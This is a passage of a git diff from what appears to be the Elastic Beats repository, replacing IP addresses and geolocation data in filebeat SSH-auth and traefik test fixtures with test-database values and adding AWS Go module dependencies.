+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.58",
         "source.port": 13996,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -2292,7 +2200,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 8711,
-        "message": "Received disconnect from 116.31.116.27: 11:  [preauth]",
+        "message": "Received disconnect from 216.160.83.58: 11:  [preauth]",
         "process.name": "sshd",
         "process.pid": 2778,
         "related.hosts": [
@@ -2309,7 +2217,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 8802,
-        "message": "PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27  user=root",
+        "message": "PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58  user=root",
         "process.name": "sshd",
         "process.pid": 2778,
         "related.hosts": [
@@ -2326,7 +2234,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 8942,
-        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root",
+        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root",
         "process.name": "sshd",
         "process.pid": 2785,
         "related.hosts": [
@@ -2379,22 +2287,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 3300,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -2445,22 +2349,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 3300,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -2511,22 +2411,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 3300,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -2577,22 +2473,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 3300,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -2643,22 +2535,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 3300,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -2690,7 +2578,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 10241,
-        "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root",
+        "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root",
         "process.name": "sshd",
         "process.pid": 2785,
         "related.hosts": [
@@ -2724,7 +2612,7 @@
         "host.hostname": "slave22",
         "input.type": "log",
         "log.offset": 10465,
-        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root",
+        "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root",
         "process.name": "sshd",
         "process.pid": 2797,
         "related.hosts": [
@@ -2777,22 +2665,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1347,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
diff --git a/filebeat/module/system/auth/test/test.log b/filebeat/module/system/auth/test/test.log
index d1bea07e2a21..1766868fdd3c 100644
--- a/filebeat/module/system/auth/test/test.log
+++ b/filebeat/module/system/auth/test/test.log
@@ -1,9 +1,9 @@
 Feb 21 21:54:44 localhost sshd[3402]: Accepted publickey for vagrant from 10.0.2.2 port 63673 ssh2: RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84
 Feb 23 00:13:35 localhost sshd[7483]: Accepted password for vagrant from 192.168.33.1 port 58803 ssh2
 Feb 21 21:56:12 localhost sshd[3430]: Invalid user test from 10.0.2.2
-Feb 20 08:35:22 slave22 sshd[5774]: Failed password for root from 116.31.116.24 port 29160 ssh2
+Feb 20 08:35:22 slave22 sshd[5774]: Failed password for root from 216.160.83.57 port 29160 ssh2
 Feb 21 23:35:33 localhost sudo: vagrant : TTY=pts/0 ; PWD=/home/vagrant ; USER=root ; COMMAND=/bin/ls
-Feb 19 15:30:04 slave22 sshd[18406]: Did not receive identification string from 123.57.245.163
+Feb 19 15:30:04 slave22 sshd[18406]: Did not receive identification string from 2.125.160.217
 Feb 23 00:08:48 localhost sudo: vagrant : TTY=pts/1 ; PWD=/home/vagrant ; USER=root ; COMMAND=/bin/cat /var/log/secure
 Feb 24 00:13:02 precise32 sudo:      tsg : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/vagrant ; USER=root ; COMMAND=/bin/ls
 Feb 22 11:47:05 localhost groupadd[6991]: new group: name=apache, GID=48
diff --git a/filebeat/module/system/auth/test/test.log-expected.json b/filebeat/module/system/auth/test/test.log-expected.json
index de48fc115401..ffea8aac02f8 100644
--- a/filebeat/module/system/auth/test/test.log-expected.json
+++ b/filebeat/module/system/auth/test/test.log-expected.json
@@ -132,22 +132,22 @@
             "slave22"
         ],
         "related.ip": [
-            "116.31.116.24"
+            "216.160.83.57"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 134764,
-        "source.as.organization.name": "CHINANET Guangdong province network",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 23.1167,
-        "source.geo.location.lon": 113.25,
-        "source.geo.region_iso_code": "CN-GD",
-        "source.geo.region_name": "Guangdong",
-        "source.ip": "116.31.116.24",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "source.port": 29160,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -193,21 +193,19 @@
             "slave22"
         ],
         "related.ip": [
-            "123.57.245.163"
+            "2.125.160.217"
         ],
         "service.type": "system",
-        "source.as.number": 37963,
-        "source.as.organization.name": "Hangzhou Alibaba Advertising Co.,Ltd.",
-        "source.geo.city_name": "Hangzhou",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 30.294,
-        "source.geo.location.lon": 120.1619,
-        "source.geo.region_iso_code": "CN-ZJ",
-        "source.geo.region_name": "Zhejiang",
-        "source.ip": "123.57.245.163",
-        "system.auth.ssh.dropped_ip": "123.57.245.163"
+        "source.geo.city_name": "Boxford",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.75,
+        "source.geo.location.lon": -1.25,
+        "source.geo.region_iso_code": "GB-WBK",
+        "source.geo.region_name": "West Berkshire",
+        "source.ip": "2.125.160.217",
+        "system.auth.ssh.dropped_ip": "2.125.160.217"
     },
     {
         "event.dataset": "system.auth",
@@ -217,7 +215,7 @@
         "fileset.name": "auth",
         "host.hostname": "localhost",
         "input.type": "log",
-        "log.offset": 617,
+        "log.offset": 616,
         "process.name": "sudo",
         "related.hosts": [
             "localhost"
@@ -242,7 +240,7 @@
         "fileset.name": "auth",
         "host.hostname": "precise32",
         "input.type": "log",
-        "log.offset": 736,
+        "log.offset": 735,
         "process.name": "sudo",
         "related.hosts": [
             "precise32"
@@ -278,7 +276,7 @@
         "group.name": "apache",
         "host.hostname": "localhost",
         "input.type": "log",
-        "log.offset": 861,
+        "log.offset": 860,
         "process.name": "groupadd",
         "process.pid": 6991,
         "related.hosts": [
@@ -303,7 +301,7 @@
         "group.id": "48",
         "host.hostname": "localhost",
         "input.type": "log",
-        "log.offset": 934,
+        "log.offset": 933,
         "process.name": "useradd",
         "process.pid": 6995,
         "related.hosts": [
diff --git a/filebeat/module/traefik/access/test/test.log b/filebeat/module/traefik/access/test/test.log
index a271309d2144..868d2906f2d2 100644
--- a/filebeat/module/traefik/access/test/test.log
+++ b/filebeat/module/traefik/access/test/test.log
@@ -1,7 +1,7 @@
 192.168.33.1 - - [02/Oct/2017:20:22:07 +0000] "GET /ui/favicons/favicon-16x16.png HTTP/1.1" 304 0 "http://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 262 "Host-host-1" "http://172.19.0.3:5601" 2ms
-85.181.35.98 - - [02/Oct/2017:20:22:08 +0000] "GET /ui/favicons/favicon.ico HTTP/1.1" 304 0 "http://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 271 "Host-host1" "http://172.19.0.3:5601" 3ms
-70.29.80.15 - - [28/Feb/2018:17:30:33 +0000] "GET /en/ HTTP/2.0" 200 2814 - "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1" 13 "Host-host1-com-0" "http://172.19.0.6:14008" 247ms
+81.2.69.143 - - [02/Oct/2017:20:22:08 +0000] "GET /ui/favicons/favicon.ico HTTP/1.1" 304 0 "http://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 271 "Host-host1" "http://172.19.0.3:5601" 3ms
+67.43.156.15 - - [28/Feb/2018:17:30:33 +0000] "GET /en/ HTTP/2.0" 200 2814 - "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1" 13 "Host-host1-com-0" "http://172.19.0.6:14008" 247ms
 ::1 - - [29/Nov/2018:15:03:51 +0000] "GET / HTTP/1.1" 404 19 "-" "curl/7.62.0" 10 "backend not found" "/" 0ms
-94.254.131.115 - - [19/Jan/2018:10:01:02 +0000] "GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1" 200 85 - "Android" 623112 "Host-api-wearerealitygames-com-2" "http://172.25.0.9:4140" 13ms
-89.64.35.193 - - [19/Jan/2018:10:01:02 +0000] "GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1" 200 150 - "Android" 623114 "Host-api-wearerealitygames-com-2" "http://172.25.0.6:4140" 8ms
+216.160.83.60 - - [19/Jan/2018:10:01:02 +0000] "GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1" 200 85 - "Android" 623112 "Host-api-wearerealitygames-com-2" "http://172.25.0.9:4140" 13ms
+81.2.69.193 - - [19/Jan/2018:10:01:02 +0000] "GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1" 200 150 - "Android" 623114 "Host-api-wearerealitygames-com-2" "http://172.25.0.6:4140" 8ms
 127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326
diff --git a/filebeat/module/traefik/access/test/test.log-expected.json b/filebeat/module/traefik/access/test/test.log-expected.json
index ce695210bef1..9a40d0e57cfb 100644
--- a/filebeat/module/traefik/access/test/test.log-expected.json
+++ b/filebeat/module/traefik/access/test/test.log-expected.json
@@ -50,7 +50,7 @@
         "event.duration": 3000000,
         "event.kind": "event",
         "event.module": "traefik",
-        "event.original": "85.181.35.98 - - [02/Oct/2017:20:22:08 +0000] \"GET /ui/favicons/favicon.ico HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 271 \"Host-host1\" \"http://172.19.0.3:5601\" 3ms",
+        "event.original": "81.2.69.143 - - [02/Oct/2017:20:22:08 +0000] \"GET /ui/favicons/favicon.ico HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 271 \"Host-host1\" \"http://172.19.0.3:5601\" 3ms",
         "event.outcome": "success",
         "event.type": [
             "access"
@@ -64,21 +64,19 @@
         "input.type": "log",
         "log.offset": 280,
         "related.ip": [
-            "85.181.35.98"
+            "81.2.69.143"
         ],
         "service.type": "traefik",
-        "source.address": "85.181.35.98",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Berlin",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 52.4473,
-        "source.geo.location.lon": 13.4531,
-        "source.geo.region_iso_code": "DE-BE",
-        "source.geo.region_name": "Land Berlin",
-        "source.ip": "85.181.35.98",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "traefik.access.backend_url": "http://172.19.0.3:5601",
         "traefik.access.frontend_name": "Host-host1",
         "traefik.access.request_count": 271,
@@ -102,7 +100,7 @@
         "event.duration": 247000000,
         "event.kind": "event",
         "event.module": "traefik",
-        "event.original": "70.29.80.15 - - [28/Feb/2018:17:30:33 +0000] \"GET /en/ HTTP/2.0\" 200 2814 - \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" 13 \"Host-host1-com-0\" \"http://172.19.0.6:14008\" 247ms",
+        "event.original": "67.43.156.15 - - [28/Feb/2018:17:30:33 +0000] \"GET /en/ HTTP/2.0\" 200 2814 - \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" 13 \"Host-host1-com-0\" \"http://172.19.0.6:14008\" 247ms",
         "event.outcome": "success",
         "event.type": [
             "access"
@@ -113,23 +111,19 @@
         "http.response.status_code": 200,
         "http.version": "2.0",
         "input.type": "log",
-        "log.offset": 553,
+        "log.offset": 552,
         "related.ip": [
-            "70.29.80.15"
+            "67.43.156.15"
         ],
         "service.type": "traefik",
-        "source.address": "70.29.80.15",
-        "source.as.number": 577,
-        "source.as.organization.name": "Bell Canada",
-        "source.geo.city_name": "Ottawa",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "CA",
-        "source.geo.country_name": "Canada",
-        "source.geo.location.lat": 45.2691,
-        "source.geo.location.lon": -75.7518,
-        "source.geo.region_iso_code": "CA-ON",
-        "source.geo.region_name": "Ontario",
-        "source.ip": "70.29.80.15",
+        "source.address": "67.43.156.15",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.15",
         "traefik.access.backend_url": "http://172.19.0.6:14008",
         "traefik.access.frontend_name": "Host-host1-com-0",
         "traefik.access.request_count": 13,
@@ -194,7 +188,7 @@
         "event.duration": 13000000,
         "event.kind": "event",
         "event.module": "traefik",
-        "event.original": "94.254.131.115 - - [19/Jan/2018:10:01:02 +0000] \"GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1\" 200 85 - \"Android\" 623112 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.9:4140\" 13ms",
+        "event.original": "216.160.83.60 - - [19/Jan/2018:10:01:02 +0000] \"GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1\" 200 85 - \"Android\" 623112 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.9:4140\" 13ms",
         "event.outcome": "success",
         "event.type": [
             "access"
@@ -207,21 +201,20 @@
         "input.type": "log",
         "log.offset": 931,
         "related.ip": [
-            "94.254.131.115"
+            "216.160.83.60"
         ],
         "service.type": "traefik",
-        "source.address": "94.254.131.115",
-        "source.as.number": 39603,
-        "source.as.organization.name": "Play",
-        "source.geo.city_name": "Warsaw",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "PL",
-        "source.geo.country_name": "Poland",
-        "source.geo.location.lat": 52.25,
-        "source.geo.location.lon": 21.0,
-        "source.geo.region_iso_code": "PL-14",
-        "source.geo.region_name": "Mazovia",
-        "source.ip": "94.254.131.115",
+        "source.address": "216.160.83.60",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.60",
         "traefik.access.backend_url": "http://172.25.0.9:4140",
         "traefik.access.frontend_name": "Host-api-wearerealitygames-com-2",
         "traefik.access.request_count": 623112,
@@ -244,7 +237,7 @@
         "event.duration": 8000000,
         "event.kind": "event",
         "event.module": "traefik",
-        "event.original": "89.64.35.193 - - [19/Jan/2018:10:01:02 +0000] \"GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1\" 200 150 - \"Android\" 623114 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.6:4140\" 8ms",
+        "event.original": "81.2.69.193 - - [19/Jan/2018:10:01:02 +0000] \"GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1\" 200 150 - \"Android\" 623114 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.6:4140\" 8ms",
         "event.outcome": "success",
         "event.type": [
             "access"
@@ -255,23 +248,21 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 1267,
+        "log.offset": 1266,
         "related.ip": [
-            "89.64.35.193"
+            "81.2.69.193"
         ],
         "service.type": "traefik",
-        "source.address": "89.64.35.193",
-        "source.as.number": 6830,
-        "source.as.organization.name": "Liberty Global B.V.",
-        "source.geo.city_name": "Gda\u0144sk",
+        "source.address": "81.2.69.193",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "PL",
-        "source.geo.country_name": "Poland",
-        "source.geo.location.lat": 54.3605,
-        "source.geo.location.lon": 18.649,
-        "source.geo.region_iso_code": "PL-22",
-        "source.geo.region_name": "Pomerania",
-        "source.ip": "89.64.35.193",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "traefik.access.backend_url": "http://172.25.0.6:4140",
         "traefik.access.frontend_name": "Host-api-wearerealitygames-com-2",
         "traefik.access.request_count": 623114,
@@ -304,7 +295,7 @@
         "http.response.status_code": 200,
         "http.version": "1.0",
         "input.type": "log",
-        "log.offset": 1581,
+        "log.offset": 1579,
         "related.ip": [
             "127.0.0.1"
         ],
diff --git a/go.mod b/go.mod
index a2dc34ec7332..b0b1a53eac42 100644
--- a/go.mod
+++ b/go.mod
@@ -30,8 +30,10 @@ require (
 	github.com/apoydence/eachers v0.0.0-20181020210610-23942921fe77 // indirect
 	github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5
 	github.com/aws/aws-lambda-go v1.13.3
+	github.com/aws/aws-sdk-go v1.19.48
 	github.com/aws/aws-sdk-go-v2 v0.24.0
 	github.com/awslabs/goformation/v4 v4.1.0
+	github.com/awslabs/kinesis-aggregation/go v0.0.0-20200810181507-d352038274c0
 	github.com/blakesmith/ar v0.0.0-20150311145944-8bd4349a67f2
 	github.com/bsm/sarama-cluster v2.1.14-0.20180625083203-7e67d87a6b3f+incompatible
 	github.com/cavaliercoder/badio v0.0.0-20160213150051-ce5280129e9e // indirect
diff --git a/go.sum b/go.sum
index 94ace7c2cd49..8d0167b62e3b 100644
--- a/go.sum
+++ b/go.sum
@@ -172,11 +172,15 @@ github.com/asaskevich/govalidator v0.0.0-20190424111038-f61b66f89f4a/go.mod h1:l
 github.com/aws/aws-lambda-go v1.13.3 h1:SuCy7H3NLyp+1Mrfp+m80jcbi9KYWAs9/BXwppwRDzY=
 github.com/aws/aws-lambda-go v1.13.3/go.mod h1:4UKl9IzQMoD+QF79YdCuzCwp8VbmG4VAQwij/eHl5CU=
 github.com/aws/aws-sdk-go v1.15.11/go.mod h1:mFuSZ37Z9YOHbQEwBWztmVzqXrEkub65tZoCYDt7FT0=
+github.com/aws/aws-sdk-go v1.19.48 h1:YhKzuc9xggUt8jNDc5CmIBeB8GmGtazzq0aCXO4sj6w=
+github.com/aws/aws-sdk-go v1.19.48/go.mod h1:KmX6BPdI08NWTb3/sm4ZGu5ShLoqVDhKgpiN924inxo=
 github.com/aws/aws-sdk-go-v2 v0.24.0 h1:R0lL0krk9EyTI1vmO1ycoeceGZotSzCKO51LbPGq3rU=
 github.com/aws/aws-sdk-go-v2 v0.24.0/go.mod h1:2LhT7UgHOXK3UXONKI5OMgIyoQL6zTAw/jwIeX6yqzw=
 github.com/awslabs/goformation/v3 v3.1.0/go.mod h1:hQ5RXo3GNm2laHWKizDzU5DsDy+yNcenSca2UxN0850=
 github.com/awslabs/goformation/v4 v4.1.0 h1:JRxIW0IjhYpYDrIZOTJGMu2azXKI+OK5dP56ubpywGU=
 github.com/awslabs/goformation/v4 v4.1.0/go.mod h1:MBDN7u1lMNDoehbFuO4uPvgwPeolTMA2TzX1yO6KlxI=
+github.com/awslabs/kinesis-aggregation/go v0.0.0-20200810181507-d352038274c0 h1:D97PNkeea5i2Sbq844BdbULqI5pv7yQw4thPwqEX504=
+github.com/awslabs/kinesis-aggregation/go v0.0.0-20200810181507-d352038274c0/go.mod h1:SghidfnxvX7ribW6nHI7T+IBbc9puZ9kk5Tx/88h8P4=
 github.com/beorn7/perks v0.0.0-20160804104726-4c0e84591b9a/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q=
 github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q=
 github.com/beorn7/perks v1.0.0/go.mod h1:KWe93zE9D1o94FZ5RNwFwVgaQK1VOXiVxmqh+CedLV8=
diff --git a/libbeat/tests/system/test_dashboard.py b/libbeat/tests/system/test_dashboard.py
index 338e832b0457..e02a644213e8 100644
--- a/libbeat/tests/system/test_dashboard.py
+++ b/libbeat/tests/system/test_dashboard.py
@@ -208,6 +208,7 @@ def test_dev_tool_export_dashboard_by_id_unknown_id(self):
 
         assert p.returncode != 0
 
+    @unittest.skip("Failing test: https://github.com/elastic/beats/issues/29327")
     @unittest.skipUnless(INTEGRATION_TESTS, "integration test")
     @pytest.mark.tag('integration')
     def test_dev_tool_export_dashboard_by_id_from_space(self):
diff --git a/testing/environments/GeoLite2-ASN.mmdb b/testing/environments/GeoLite2-ASN.mmdb
new file mode 100644
index 000000000000..fd4a733ba05a
